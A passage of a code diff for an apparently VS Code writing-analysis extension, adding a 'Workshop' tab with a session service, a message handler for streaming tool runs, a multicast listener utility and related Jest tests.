+  it('accepts only workshop-sourced ERROR payloads and clears them on the next run', () => {
+    const { result } = renderHook(() => useWorkshop());
+
+    const error = (source: string): ErrorMessage => ({
+      type: MessageType.ERROR,
+      source: 'extension.workshop',
+      payload: { source: source as never, message: 'Failed to run Prose', details: 'boom' },
+      timestamp: 0
+    });
+
+    act(() => {
+      result.current.handleErrorMessage(error('analysis.prose'));
+    });
+    expect(result.current.errorMessage).toBe('');
+
+    act(() => {
+      result.current.handleErrorMessage(error('workshop.run_tool'));
+    });
+    expect(result.current.errorMessage).toBe('Failed to run Prose — boom');
+
+    act(() => {
+      result.current.runTool('prose');
+    });
+    expect(result.current.errorMessage).toBe('');
+  });
+
+  it('actions post the right wire messages', () => {
+    const { result } = renderHook(() => useWorkshop());
+
+    act(() => {
+      result.current.pinExcerpt('Some prose.', 'file:///ch1.md', 'ch1.md');
+      result.current.runTool('gestures');
+      result.current.resetSession();
+    });
+
+    const pin = posted(MessageType.WORKSHOP_SET_EXCERPT)[0];
+    expect(pin.payload).toEqual({ text: 'Some prose.', sourceUri: 'file:///ch1.md', relativePath: 'ch1.md' });
+    expect(posted(MessageType.WORKSHOP_RUN_TOOL)[0].payload).toEqual({ toolId: 'gestures' });
+    expect(posted(MessageType.WORKSHOP_RESET_SESSION)).toHaveLength(1);
+  });
+});

--- a/packages/core/src/__tests__/utils/ListenerSet.test.ts
+++ b/packages/core/src/__tests__/utils/ListenerSet.test.ts
@@ -1,0 +1,99 @@
+/**
+ * ListenerSet tests — the multicast contract every shared service now rides
+ * (PR #67 review #2/#5): concurrent delivery to multiple subscribers,
+ * own-registration-only release, per-listener fault isolation.
+ */
+
+import { ListenerSet } from '@/utils/ListenerSet';
+import type { LogSink } from '@/platform';
+
+describe('ListenerSet', () => {
+  let log: { appendLine: jest.Mock };
+
+  beforeEach(() => {
+    log = { appendLine: jest.fn() };
+  });
+
+  it('delivers every emit to every live listener (two webviews, one signal)', () => {
+    const set = new ListenerSet<[number]>('[test] listener', log as unknown as LogSink);
+    const sidebar = jest.fn();
+    const workshop = jest.fn();
+    set.add(sidebar);
+    set.add(workshop);
+
+    set.emit(42);
+
+    expect(sidebar).toHaveBeenCalledWith(42);
+    expect(workshop).toHaveBeenCalledWith(42);
+  });
+
+  it('unsubscribing one listener never blinds the survivor', () => {
+    const set = new ListenerSet<[string]>('[test] listener');
+    const first = jest.fn();
+    const second = jest.fn();
+    const disposeFirst = set.add(first);
+    set.add(second);
+
+    disposeFirst();
+    set.emit('after-dispose');
+
+    expect(first).not.toHaveBeenCalled();
+    expect(second).toHaveBeenCalledWith('after-dispose');
+    expect(set.size).toBe(1);
+  });
+
+  it('unsubscribe is idempotent and scoped to its own registration', () => {
+    const set = new ListenerSet<[]>('[test] listener');
+    const listener = jest.fn();
+    const dispose = set.add(listener);
+    set.add(jest.fn());
+
+    dispose();
+    dispose(); // double-release must be harmless
+
+    expect(set.size).toBe(1);
+  });
+
+  it('a throwing listener is contained and logged; later listeners still receive', () => {
+    const set = new ListenerSet<[string]>('[test] listener', log as unknown as LogSink);
+    const explosive = jest.fn(() => {
+      throw new Error('webview A bug');
+    });
+    const survivor = jest.fn();
+    set.add(explosive);
+    set.add(survivor);
+
+    expect(() => set.emit('payload')).not.toThrow();
+
+    expect(survivor).toHaveBeenCalledWith('payload');
+    expect(log.appendLine).toHaveBeenCalledWith('[test] listener threw: webview A bug');
+  });
+
+  it('a listener unsubscribing itself mid-dispatch does not skip its siblings', () => {
+    const set = new ListenerSet<[]>('[test] listener');
+    const calls: string[] = [];
+    const disposeSelf = set.add(() => {
+      calls.push('self-remover');
+      disposeSelf();
+    });
+    set.add(() => calls.push('sibling'));
+
+    set.emit();
+    set.emit();
+
+    // Snapshot iteration: first emit reaches both, second only the sibling.
+    expect(calls).toEqual(['self-remover', 'sibling', 'sibling']);
+  });
+
+  it('clear() drops all registrations', () => {
+    const set = new ListenerSet<[]>('[test] listener');
+    const listener = jest.fn();
+    set.add(listener);
+
+    set.clear();
+    set.emit();
+
+    expect(listener).not.toHaveBeenCalled();
+    expect(set.size).toBe(0);
+  });
+});

--- a/packages/core/src/application/handlers/MessageHandler.ts
+++ b/packages/core/src/application/handlers/MessageHandler.ts
@@ -19,7 +19,8 @@ import {
   StatusMessage,
   ExtensionToWebviewMessage,
   TokenUsageUpdateMessage,
-  TokenUsageTotals
+  TokenUsageTotals,
+  WorkshopSessionStateMessage
 } from '@messages';
 import {
   CoreServices,
@@ -42,6 +43,7 @@ import { SourcesHandler } from './domain/SourcesHandler';
 import { UIHandler } from './domain/UIHandler';
 import { FileOperationsHandler } from './domain/FileOperationsHandler';
 import { AccountBalanceHandler } from './domain/AccountBalanceHandler';
+import { WorkshopHandler } from './domain/WorkshopHandler';
 
 export class MessageHandler {
   private readonly resultCache: ResultCache = {};
@@ -70,7 +72,14 @@ export class MessageHandler {
   private readonly uiHandler: UIHandler;
   private readonly fileOperationsHandler: FileOperationsHandler;
   private readonly accountBalanceHandler: AccountBalanceHandler;
+  private readonly workshopHandler: WorkshopHandler;
 
+  // Per-instance registrations on SHARED services (sidebar + Workshop panel
+  // each run a MessageHandler over the one CoreServices bundle). Dispose
+  // releases exactly these — never service-wide state another surface uses.
+  private readonly disposeTokenUsageListener: () => void;
+  private readonly disposeDictionaryStatusListener: () => void;
+  private readonly disposeSearchStatusListener: () => void;
   private readonly disposeBalanceListener: () => void;
   private readonly disposeSecretListener: () => void;
 
@@ -155,20 +164,17 @@ export class MessageHandler {
       secretsService,
       textSourceResolver,
       categorySearchService,
-      accountBalanceService
+      accountBalanceService,
+      workshopSessionService
     } = services;
 
-    aiResourceManager.setStatusCallback((message: string, tickerMessage?: string) => {
-      this.sendStatus(message, tickerMessage);
-    });
-
-    // Token tracking: centralized in AIResourceOrchestrator
-    // This callback is called after each API call with usage data
-    aiResourceManager.setTokenUsageCallback((usage) => {
+    // Token tracking: centralized in AIResourceOrchestrator. Listener-based so
+    // every live webview (sidebar + Workshop) tracks usage from ANY surface's
+    // requests; each MessageHandler keeps its own totals bag + replay cache.
+    this.disposeTokenUsageListener = aiResourceManager.addTokenUsageListener((usage) => {
       this.applyTokenUsage(usage);
     });
 
-    // Token tracking is now centralized in AIResourceOrchestrator via setTokenUsageCallback
     this.analysisHandler = new AnalysisHandler(
       assistantToolService,
       this.postMessage.bind(this),
@@ -180,8 +186,10 @@ export class MessageHandler {
       this.postMessage.bind(this)
     );
 
-    // Set status emitter for dictionary service (for fast generation progress)
-    dictionaryService.setStatusEmitter(this.sendDictionaryStatus.bind(this));
+    // Subscribe dictionary generation progress into this webview's status rail
+    this.disposeDictionaryStatusListener = dictionaryService.addStatusListener(
+      this.sendDictionaryStatus.bind(this)
+    );
 
     this.contextHandler = new ContextHandler(
       contextAssistantService,
@@ -198,7 +206,9 @@ export class MessageHandler {
       textSourceResolver
     );
 
-    categorySearchService.setStatusEmitter(this.sendSearchStatus.bind(this));
+    this.disposeSearchStatusListener = categorySearchService.addStatusListener(
+      this.sendSearchStatus.bind(this)
+    );
 
     this.searchHandler = new SearchHandler(
       wordSearchService,
@@ -265,6 +275,16 @@ export class MessageHandler {
       accountBalanceService,
       outputChannel
     );
+
+    // Workshop editor tab (ADR 2026-07-03) — the 12th domain, composed exactly
+    // like the other 11: injected services, nothing constructed here beyond
+    // the handler itself.
+    this.workshopHandler = new WorkshopHandler(
+      assistantToolService,
+      workshopSessionService,
+      this.postMessage.bind(this),
+      outputChannel
+    );
     // Post-AI-request refresh: the debounced fetch (armed in applyTokenUsage)
     // broadcasts fresh balances to the webview through the same handler.
     this.disposeBalanceListener = accountBalanceService.addRefreshListener(
@@ -294,6 +314,7 @@ export class MessageHandler {
     this.uiHandler.registerRoutes(this.router);
     this.fileOperationsHandler.registerRoutes(this.router);
     this.accountBalanceHandler.registerRoutes(this.router);
+    this.workshopHandler.registerRoutes(this.router);
 
     this.flushCachedResults();
   }
@@ -661,6 +682,10 @@ export class MessageHandler {
     if (this.resultCache.tokenUsage) {
       void this.postMessage(this.resultCache.tokenUsage);
     }
+
+    if (this.resultCache.workshopSession) {
+      void this.postMessage(this.resultCache.workshopSession);
+    }
   }
 
   private async postMessage(message: ExtensionToWebviewMessage): Promise<void> {
@@ -692,6 +717,9 @@ export class MessageHandler {
         break;
       case MessageType.TOKEN_USAGE_UPDATE:
         this.resultCache.tokenUsage = { ...message as TokenUsageUpdateMessage };
+        break;
+      case MessageType.WORKSHOP_SESSION_STATE:
+        this.resultCache.workshopSession = { ...message as WorkshopSessionStateMessage };
         break;
       case MessageType.ERROR:
         const error = message as ErrorMessage;
@@ -726,23 +754,24 @@ export class MessageHandler {
   }
 
   dispose(): void {
-    // Clear callbacks on shared services to avoid stale webview references.
-    // The config-change watcher is now owned + disposed by the shell (the provider),
-    // so MessageHandler holds no host disposables of its own.
+    // Release ONLY this instance's registrations on the shared services. Two
+    // webviews (sidebar + Workshop panel) run MessageHandlers over the same
+    // CoreServices bundle, so service-wide teardown here would blind the
+    // surviving surface. Service lifecycle belongs to the composition root
+    // (extension.ts); the config-change watcher is owned by the shell.
     try {
-      this.services.aiResourceManager.setStatusCallback(undefined);
-      this.services.aiResourceManager.setTokenUsageCallback(undefined);
-      this.services.assistantToolService.setStatusEmitter(undefined);
-      this.services.dictionaryService.setStatusEmitter(undefined);
-      this.services.categorySearchService.setStatusEmitter(undefined);
+      this.disposeTokenUsageListener();
+      this.disposeDictionaryStatusListener();
+      this.disposeSearchStatusListener();
+      this.analysisHandler.dispose();
+      this.workshopHandler.dispose();
     } catch {
       // noop
     }
-    // Cancel any armed balance refresh timer + drop the listener so a disposed
-    // handler can't fire a fetch/post after teardown.
+    // Drop the balance refresh listener so a disposed handler can't post after
+    // teardown. The service's timer keeps running for other surfaces.
     try {
       this.disposeBalanceListener();
-      this.services.accountBalanceService.dispose();
     } catch {
       // noop
     }

--- a/packages/core/src/application/handlers/MessageHandlerContracts.ts
+++ b/packages/core/src/application/handlers/MessageHandlerContracts.ts
@@ -8,10 +8,12 @@ import type {
   MetricsResultMessage,
   SearchResultMessage,
   StatusMessage,
-  TokenUsageUpdateMessage
+  TokenUsageUpdateMessage,
+  WorkshopSessionStateMessage
 } from '@messages';
 import type { AIResourceManager } from '@orchestration/AIResourceManager';
 import type { AssistantToolService } from '@services/analysis/AssistantToolService';
+import type { WorkshopSessionService } from '@/application/services/WorkshopSessionService';
 import type { ContextAssistantService } from '@services/analysis/ContextAssistantService';
 import type { DictionaryService } from '@services/dictionary/DictionaryService';
 import type { ProseStatsService } from '@services/measurement/ProseStatsService';
@@ -52,6 +54,7 @@ export interface ResultCache {
   status?: StatusMessage;
   error?: ErrorMessage;
   tokenUsage?: TokenUsageUpdateMessage;
+  workshopSession?: WorkshopSessionStateMessage;
 }
 
 /**
@@ -72,4 +75,10 @@ export interface CoreServices {
   textSourceResolver: TextSourceResolver;
   categorySearchService: CategorySearchService;
   accountBalanceService: AccountBalanceService;
+  /**
+   * Workshop session aggregate (ADR 2026-07-03). Composition-root-owned so the
+   * thread outlives any single webview's MessageHandler — reopening the panel
+   * or reloading its webview rehydrates from this one instance.
+   */
+  workshopSessionService: WorkshopSessionService;
 }

--- a/packages/core/src/application/handlers/domain/AnalysisHandler.ts
+++ b/packages/core/src/application/handlers/domain/AnalysisHandler.ts
@@ -34,15 +34,37 @@ export class AnalysisHandler {
   // Track active abort controllers by request ID for cancellation
   private activeRequests = new Map<string, AbortController>();
 
+  private readonly disposeStatusListener: () => void;
+
   constructor(
     private readonly assistantToolService: AssistantToolService,
     private readonly postMessage: MessageTransport,
     private readonly settings: SettingsStore
   ) {
-    // Inject status emitter for guide loading notifications
-    this.assistantToolService.setStatusEmitter((message, progress, tickerMessage) => {
-      this.sendStatus(message, progress, tickerMessage);
-    });
+    // Guide-loading status is forwarded ONLY while this handler has a run in
+    // flight: the service is shared across webviews (sidebar + Workshop), and
+    // un-gated forwarding would strand another surface's "Loading craft
+    // guides…" here with nothing to ever clear it.
+    this.disposeStatusListener = this.assistantToolService.addStatusListener(
+      (message, progress, tickerMessage) => {
+        if (this.activeRequests.size > 0) {
+          this.sendStatus(message, progress, tickerMessage);
+        }
+      }
+    );
+  }
+
+  /**
+   * Release the shared-service subscription and abort any in-flight runs.
+   * Called by MessageHandler when its webview goes away — a disposed surface
+   * must neither receive status nor keep burning tokens.
+   */
+  dispose(): void {
+    this.disposeStatusListener();
+    for (const controller of this.activeRequests.values()) {
+      controller.abort();
+    }
+    this.activeRequests.clear();
   }
 
   /**

--- a/packages/core/src/application/handlers/domain/WorkshopHandler.ts
+++ b/packages/core/src/application/handlers/domain/WorkshopHandler.ts
@@ -49,7 +49,7 @@ const generateRequestId = (type: string) => `${type}-${Date.now()}-${++requestId
 
 export class WorkshopHandler {
   /** The single in-flight run — Sprint 2 semantics allow at most one. */
-  private activeRun?: { requestId: string; controller: AbortController };
+  private activeRun?: { requestId: string; toolId: WorkshopToolId; controller: AbortController };
 
   private readonly disposeStatusListener: () => void;
 
@@ -89,6 +89,9 @@ export class WorkshopHandler {
   dispose(): void {
     this.disposeStatusListener();
     if (this.activeRun) {
+      this.outputChannel.appendLine(
+        `[WorkshopHandler] Aborting in-flight run on dispose: ${this.activeRun.requestId}`
+      );
       this.activeRun.controller.abort();
       this.session.abandonToolRun(this.activeRun.requestId);
       this.activeRun = undefined;
@@ -117,7 +120,7 @@ export class WorkshopHandler {
     const toolLabel = workshopToolLabel(toolId);
     const requestId = generateRequestId(`workshop_${toolId}`);
     const controller = new AbortController();
-    this.activeRun = { requestId, controller };
+    this.activeRun = { requestId, toolId, controller };
 
     const userTurn = this.session.beginToolRun(toolId, requestId);
     this.postTurn(userTurn);
@@ -139,6 +142,14 @@ export class WorkshopHandler {
       const truncated = result.finishReason === 'length';
 
       if (cancelled) {
+        // A designed disappearance still leaves a named trail (PR #67 #4):
+        // this is the branch an aborted run actually resolves through — the
+        // orchestrator catches AbortError internally and returns partial
+        // content — so the requestId-correlated line lives HERE, not in the
+        // AbortError catch below.
+        this.outputChannel.appendLine(
+          `[WorkshopHandler] Run cancelled: ${requestId} (${toolLabel}, ${result.content.length} chars discarded)`
+        );
         this.session.abandonToolRun(requestId);
         this.sendStreamComplete(requestId, '', true);
       } else if (isApiKeyNotConfiguredWarning(result.content)) {
@@ -159,6 +170,10 @@ export class WorkshopHandler {
         // the aggregate already refused the turn, so the thread stays honest.
         if (assistantTurn) {
           this.postTurn(assistantTurn);
+        } else {
+          this.outputChannel.appendLine(
+            `[WorkshopHandler] Discarded zombie completion: ${requestId} (${toolLabel}) — session was reset or the run preempted mid-stream`
+          );
         }
       }
       this.postSessionState();
@@ -178,7 +193,12 @@ export class WorkshopHandler {
       if (this.activeRun?.requestId === requestId) {
         this.activeRun = undefined;
       }
-      this.sendStatus('');
+      // Only blank the ticker when NO successor owns the slot (PR #67 #15):
+      // a preempted run's late finally must not erase the new run's
+      // "Streaming…" status mid-stream.
+      if (!this.activeRun) {
+        this.sendStatus('');
+      }
     }
   }
 
@@ -187,6 +207,20 @@ export class WorkshopHandler {
 
     if (typeof text !== 'string' || text.trim().length === 0) {
       this.sendError('workshop', 'Cannot pin an empty excerpt.');
+      return;
+    }
+
+    // Mid-run re-pin guard (PR #67 review #3, Sam): the running analysis
+    // captured the OLD excerpt, and turns carry no excerpt provenance yet —
+    // a swap here would leave the finished turn silently describing text
+    // that's no longer pinned. The rail disables its buttons on isRunning,
+    // but that flag only lands after a message round-trip; this closes the
+    // race window at the source of truth.
+    if (this.activeRun) {
+      this.sendError(
+        'workshop',
+        'A tool is still running. Wait for it to finish (or start a new session) before replacing the excerpt.'
+      );
       return;
     }
 
@@ -243,6 +277,9 @@ export class WorkshopHandler {
 
   private preemptActiveRun(): void {
     if (this.activeRun) {
+      this.outputChannel.appendLine(
+        `[WorkshopHandler] Preempting in-flight run: ${this.activeRun.requestId} (${workshopToolLabel(this.activeRun.toolId)})`
+      );
       this.activeRun.controller.abort();
       this.session.abandonToolRun(this.activeRun.requestId);
       this.activeRun = undefined;

--- a/packages/core/src/application/handlers/domain/WorkshopHandler.ts
+++ b/packages/core/src/application/handlers/domain/WorkshopHandler.ts
@@ -1,0 +1,336 @@
+/**
+ * Workshop domain handler (ADR 2026-07-03, Sprint 2 — session spine).
+ *
+ * The 12th domain. Routes the Workshop editor tab's messages onto the
+ * EXISTING analysis tools: WORKSHOP_RUN_TOOL invokes dialogue / prose / the
+ * twelve WritingToolsFocus modes through AssistantToolService, streams chunks
+ * under `domain: 'workshop'`, and appends the completed turn pair to the
+ * shared WorkshopSessionService aggregate. Session truth lives in the
+ * service (composition-root-owned, outlives this handler); the handler owns
+ * only messaging, streaming, and run lifecycle.
+ *
+ * Sprint 2 is single-turn: each run is a fresh request — a second run
+ * preempts any in-flight one rather than continuing it. The
+ * ConversationManager continuation seam is Sprint 3.
+ */
+
+import { LogSink } from '@/platform';
+import { AssistantToolService } from '@services/analysis/AssistantToolService';
+import { WorkshopSessionService } from '@/application/services/WorkshopSessionService';
+import { isWorkshopToolId, workshopToolLabel } from '@shared/constants/workshopTools';
+import {
+  MessageType,
+  ErrorMessage,
+  ErrorSource,
+  StatusMessage,
+  StreamStartedMessage,
+  StreamChunkMessage,
+  StreamCompleteMessage,
+  TokenUsage,
+  WorkshopExcerpt,
+  WorkshopRequestSessionMessage,
+  WorkshopResetSessionMessage,
+  WorkshopRunToolMessage,
+  WorkshopSetExcerptMessage,
+  WorkshopSessionStateMessage,
+  WorkshopToolId,
+  WorkshopTurn,
+  WorkshopTurnMessage,
+  isApiKeyNotConfiguredWarning
+} from '@messages';
+import { AnalysisResult } from '@/domain/models/AnalysisResult';
+import { AnalysisStreamingOptions } from '@services/analysis/AssistantToolService';
+import { MessageTransport } from '@handlers/MessageHandlerContracts';
+import { MessageRouter } from '../MessageRouter';
+
+// Generate unique request IDs (module-scoped counter, same idiom as AnalysisHandler)
+let requestIdCounter = 0;
+const generateRequestId = (type: string) => `${type}-${Date.now()}-${++requestIdCounter}`;
+
+export class WorkshopHandler {
+  /** The single in-flight run — Sprint 2 semantics allow at most one. */
+  private activeRun?: { requestId: string; controller: AbortController };
+
+  private readonly disposeStatusListener: () => void;
+
+  constructor(
+    private readonly assistantToolService: AssistantToolService,
+    private readonly session: WorkshopSessionService,
+    private readonly postMessage: MessageTransport,
+    private readonly outputChannel: LogSink
+  ) {
+    // Guide-loading status is forwarded only while a Workshop run is in
+    // flight — the service is shared with the sidebar's AnalysisHandler, and
+    // un-gated forwarding would strand the other surface's status here.
+    this.disposeStatusListener = this.assistantToolService.addStatusListener(
+      (message, progress, tickerMessage) => {
+        if (this.activeRun) {
+          this.sendStatus(message, progress, tickerMessage);
+        }
+      }
+    );
+  }
+
+  /**
+   * Register message routes for the workshop domain
+   */
+  registerRoutes(router: MessageRouter): void {
+    router.register(MessageType.WORKSHOP_RUN_TOOL, this.handleRunTool.bind(this));
+    router.register(MessageType.WORKSHOP_SET_EXCERPT, this.handleSetExcerpt.bind(this));
+    router.register(MessageType.WORKSHOP_RESET_SESSION, this.handleResetSession.bind(this));
+    router.register(MessageType.WORKSHOP_REQUEST_SESSION, this.handleRequestSession.bind(this));
+  }
+
+  /**
+   * Release the shared-service subscription and abort any in-flight run.
+   * The session aggregate survives (it is composition-root-owned) — only this
+   * webview's run and listeners die with it.
+   */
+  dispose(): void {
+    this.disposeStatusListener();
+    if (this.activeRun) {
+      this.activeRun.controller.abort();
+      this.session.abandonToolRun(this.activeRun.requestId);
+      this.activeRun = undefined;
+    }
+  }
+
+  // Message handlers
+
+  async handleRunTool(message: WorkshopRunToolMessage): Promise<void> {
+    const { toolId } = message.payload;
+
+    if (!isWorkshopToolId(toolId)) {
+      this.sendError('workshop.run_tool', `Unknown Workshop tool: ${String(toolId)}`);
+      return;
+    }
+
+    const excerpt = this.session.getExcerpt();
+    if (!excerpt || excerpt.text.trim().length === 0) {
+      this.sendError('workshop.run_tool', 'Pin an excerpt before running a tool.');
+      return;
+    }
+
+    // A new run preempts any in-flight one: fresh turn, never continuation.
+    this.preemptActiveRun();
+
+    const toolLabel = workshopToolLabel(toolId);
+    const requestId = generateRequestId(`workshop_${toolId}`);
+    const controller = new AbortController();
+    this.activeRun = { requestId, controller };
+
+    const userTurn = this.session.beginToolRun(toolId, requestId);
+    this.postTurn(userTurn);
+    // Snapshot after the user turn: keeps the replay cache fresh so a webview
+    // that reloads mid-run rehydrates the attempt (and its active tool).
+    this.postSessionState();
+    this.sendStreamStarted(requestId);
+    this.sendStatus(`Streaming ${toolLabel}…`);
+
+    try {
+      const result = await this.invokeTool(toolId, excerpt, {
+        signal: controller.signal,
+        onToken: (token: string) => {
+          this.sendStreamChunk(requestId, token);
+        }
+      });
+
+      const cancelled = controller.signal.aborted;
+      const truncated = result.finishReason === 'length';
+
+      if (cancelled) {
+        this.session.abandonToolRun(requestId);
+        this.sendStreamComplete(requestId, '', true);
+      } else if (isApiKeyNotConfiguredWarning(result.content)) {
+        // Config problem, not an analysis: keep the thread clean and surface
+        // it through the error rail instead of appending an assistant turn.
+        this.session.abandonToolRun(requestId);
+        this.sendStreamComplete(requestId, '', true);
+        this.sendError('workshop.run_tool', 'OpenRouter API key not configured.', result.content);
+      } else {
+        this.sendStreamComplete(requestId, result.content, false, result.usage, truncated);
+        const assistantTurn = this.session.completeToolRun(
+          requestId,
+          result.content,
+          result.usage,
+          truncated
+        );
+        // Stale means the session was reset (or the run preempted) mid-stream;
+        // the aggregate already refused the turn, so the thread stays honest.
+        if (assistantTurn) {
+          this.postTurn(assistantTurn);
+        }
+      }
+      this.postSessionState();
+    } catch (error) {
+      const details = error instanceof Error ? error.message : String(error);
+      this.session.abandonToolRun(requestId);
+      // Always complete the stream so the webview's streaming affordance
+      // unsticks; the ERROR message carries the diagnostics.
+      this.sendStreamComplete(requestId, '', true);
+      if (error instanceof Error && error.name === 'AbortError') {
+        this.sendStatus(`${toolLabel} cancelled`);
+      } else {
+        this.sendError('workshop.run_tool', `Failed to run ${toolLabel}`, details);
+      }
+      this.postSessionState();
+    } finally {
+      if (this.activeRun?.requestId === requestId) {
+        this.activeRun = undefined;
+      }
+      this.sendStatus('');
+    }
+  }
+
+  async handleSetExcerpt(message: WorkshopSetExcerptMessage): Promise<void> {
+    const { text, sourceUri, relativePath } = message.payload;
+
+    if (typeof text !== 'string' || text.trim().length === 0) {
+      this.sendError('workshop', 'Cannot pin an empty excerpt.');
+      return;
+    }
+
+    this.session.setExcerpt({ text, sourceUri, relativePath });
+    this.outputChannel.appendLine(
+      `[WorkshopHandler] Excerpt pinned (${text.length} chars${relativePath ? `, ${relativePath}` : ''})`
+    );
+    this.postSessionState();
+  }
+
+  async handleResetSession(_message: WorkshopResetSessionMessage): Promise<void> {
+    this.preemptActiveRun();
+    this.session.reset();
+    this.outputChannel.appendLine('[WorkshopHandler] Session reset');
+    this.postSessionState();
+  }
+
+  async handleRequestSession(_message: WorkshopRequestSessionMessage): Promise<void> {
+    this.postSessionState();
+  }
+
+  // Tool routing — maps the catalog ids onto the three existing service calls.
+
+  private invokeTool(
+    toolId: WorkshopToolId,
+    excerpt: WorkshopExcerpt,
+    streamingOptions: AnalysisStreamingOptions
+  ): Promise<AnalysisResult> {
+    if (toolId === 'dialogue') {
+      return this.assistantToolService.analyzeDialogue(
+        excerpt.text,
+        undefined,
+        excerpt.sourceUri,
+        undefined,
+        streamingOptions
+      );
+    }
+    if (toolId === 'prose') {
+      return this.assistantToolService.analyzeProse(
+        excerpt.text,
+        undefined,
+        excerpt.sourceUri,
+        streamingOptions
+      );
+    }
+    return this.assistantToolService.analyzeWritingTools(
+      excerpt.text,
+      undefined,
+      excerpt.sourceUri,
+      toolId,
+      streamingOptions
+    );
+  }
+
+  private preemptActiveRun(): void {
+    if (this.activeRun) {
+      this.activeRun.controller.abort();
+      this.session.abandonToolRun(this.activeRun.requestId);
+      this.activeRun = undefined;
+    }
+  }
+
+  // Message helpers (domain owns its message lifecycle)
+
+  private postTurn(turn: WorkshopTurn): void {
+    const message: WorkshopTurnMessage = {
+      type: MessageType.WORKSHOP_TURN,
+      source: 'extension.workshop',
+      payload: { turn },
+      timestamp: Date.now()
+    };
+    void this.postMessage(message);
+  }
+
+  private postSessionState(): void {
+    const message: WorkshopSessionStateMessage = {
+      type: MessageType.WORKSHOP_SESSION_STATE,
+      source: 'extension.workshop',
+      payload: { session: this.session.getSnapshot() },
+      timestamp: Date.now()
+    };
+    void this.postMessage(message);
+  }
+
+  private sendStreamStarted(requestId: string): void {
+    const message: StreamStartedMessage = {
+      type: MessageType.STREAM_STARTED,
+      source: 'extension.workshop',
+      payload: { requestId, domain: 'workshop' },
+      timestamp: Date.now()
+    };
+    void this.postMessage(message);
+  }
+
+  private sendStreamChunk(requestId: string, token: string): void {
+    const message: StreamChunkMessage = {
+      type: MessageType.STREAM_CHUNK,
+      source: 'extension.workshop',
+      payload: { requestId, domain: 'workshop', token },
+      timestamp: Date.now()
+    };
+    void this.postMessage(message);
+  }
+
+  private sendStreamComplete(
+    requestId: string,
+    content: string,
+    cancelled: boolean,
+    usage?: TokenUsage,
+    truncated: boolean = false
+  ): void {
+    const message: StreamCompleteMessage = {
+      type: MessageType.STREAM_COMPLETE,
+      source: 'extension.workshop',
+      payload: { requestId, domain: 'workshop', content, cancelled, usage, truncated },
+      timestamp: Date.now()
+    };
+    void this.postMessage(message);
+  }
+
+  private sendStatus(
+    message: string,
+    progress?: { current: number; total: number },
+    tickerMessage?: string
+  ): void {
+    const statusMessage: StatusMessage = {
+      type: MessageType.STATUS,
+      source: 'extension.workshop',
+      payload: { message, progress, tickerMessage },
+      timestamp: Date.now()
+    };
+    void this.postMessage(statusMessage);
+  }
+
+  private sendError(source: ErrorSource, message: string, details?: string): void {
+    const errorMessage: ErrorMessage = {
+      type: MessageType.ERROR,
+      source: 'extension.workshop',
+      payload: { source, message, details },
+      timestamp: Date.now()
+    };
+    void this.postMessage(errorMessage);
+    this.outputChannel.appendLine(
+      `[WorkshopHandler] ERROR [${source}]: ${message}${details ? ` - ${details}` : ''}`
+    );
+  }
+}

--- a/packages/core/src/application/services/WorkshopSessionService.ts
+++ b/packages/core/src/application/services/WorkshopSessionService.ts
@@ -1,0 +1,157 @@
+/**
+ * WorkshopSessionService — Application layer (ADR 2026-07-03, Sprint 2).
+ *
+ * The host-side session aggregate for the Workshop editor tab: pinned excerpt
+ * (+ source metadata), context-brief reference (seeded in Sprint 3), the
+ * ordered turn thread, and the in-flight run. Session state lives HERE, never
+ * in React — the webview renders snapshots and increments, so a reload or
+ * reopen rehydrates the thread from this object (the ADR's reload-safety
+ * criterion). Constructed once in extension.ts and shared through the
+ * CoreServices bundle so it outlives any single webview's MessageHandler.
+ *
+ * Pure and dependency-free (an injectable clock is the only seam, for tests):
+ * no vscode, no React, no I/O. WorkshopHandler owns messaging and streaming;
+ * this class owns nothing but session truth.
+ *
+ * Sprint 2 is single-turn: begin/complete each describe one tool run. The
+ * multi-turn continuation seam (ConversationManager) arrives in Sprint 3.
+ */
+
+import {
+  WorkshopExcerpt,
+  WorkshopSessionSnapshot,
+  WorkshopToolId,
+  WorkshopTurn
+} from '@messages';
+import { TokenUsage } from '@shared/types';
+import { workshopToolLabel } from '@shared/constants/workshopTools';
+
+export interface WorkshopExcerptInput {
+  text: string;
+  sourceUri?: string;
+  relativePath?: string;
+}
+
+export class WorkshopSessionService {
+  private excerpt?: WorkshopExcerpt;
+  private contextBrief?: string;
+  private turns: WorkshopTurn[] = [];
+  private activeRun?: { requestId: string; toolId: WorkshopToolId };
+  private turnCounter = 0;
+
+  constructor(private readonly now: () => number = Date.now) {}
+
+  /** Pin (or replace) the working excerpt. Host stamps the pin time. */
+  setExcerpt(input: WorkshopExcerptInput): WorkshopExcerpt {
+    this.excerpt = {
+      text: input.text,
+      sourceUri: input.sourceUri,
+      relativePath: input.relativePath,
+      pinnedAt: this.now()
+    };
+    return { ...this.excerpt };
+  }
+
+  getExcerpt(): WorkshopExcerpt | undefined {
+    return this.excerpt ? { ...this.excerpt } : undefined;
+  }
+
+  /**
+   * Record the start of a tool run: appends the deterministic user turn and
+   * marks the run active. Throws when no usable excerpt is pinned — the
+   * aggregate refuses to represent a run against nothing.
+   */
+  beginToolRun(toolId: WorkshopToolId, requestId: string): WorkshopTurn {
+    if (!this.excerpt || this.excerpt.text.trim().length === 0) {
+      throw new Error('Cannot run a Workshop tool without a pinned excerpt');
+    }
+    const toolLabel = workshopToolLabel(toolId);
+    const turn: WorkshopTurn = {
+      id: this.nextTurnId('user'),
+      role: 'user',
+      kind: 'tool_run',
+      toolId,
+      toolLabel,
+      content: `Run **${toolLabel}** on the pinned excerpt.`,
+      timestamp: this.now()
+    };
+    this.turns.push(turn);
+    this.activeRun = { requestId, toolId };
+    return cloneTurn(turn);
+  }
+
+  /**
+   * Record a finished run: appends the assistant turn and clears the active
+   * run. Returns undefined for a stale requestId (the session was reset or the
+   * run preempted mid-stream) — the aggregate silently refuses turns that no
+   * longer belong to it.
+   */
+  completeToolRun(
+    requestId: string,
+    content: string,
+    usage?: TokenUsage,
+    truncated?: boolean
+  ): WorkshopTurn | undefined {
+    if (this.activeRun?.requestId !== requestId) {
+      return undefined;
+    }
+    const { toolId } = this.activeRun;
+    this.activeRun = undefined;
+    const turn: WorkshopTurn = {
+      id: this.nextTurnId('assistant'),
+      role: 'assistant',
+      kind: 'tool_run',
+      toolId,
+      toolLabel: workshopToolLabel(toolId),
+      content,
+      timestamp: this.now(),
+      usage: usage ? { ...usage } : undefined,
+      truncated: truncated || undefined
+    };
+    this.turns.push(turn);
+    return cloneTurn(turn);
+  }
+
+  /**
+   * Clear the active run without an assistant turn (cancelled, preempted, or
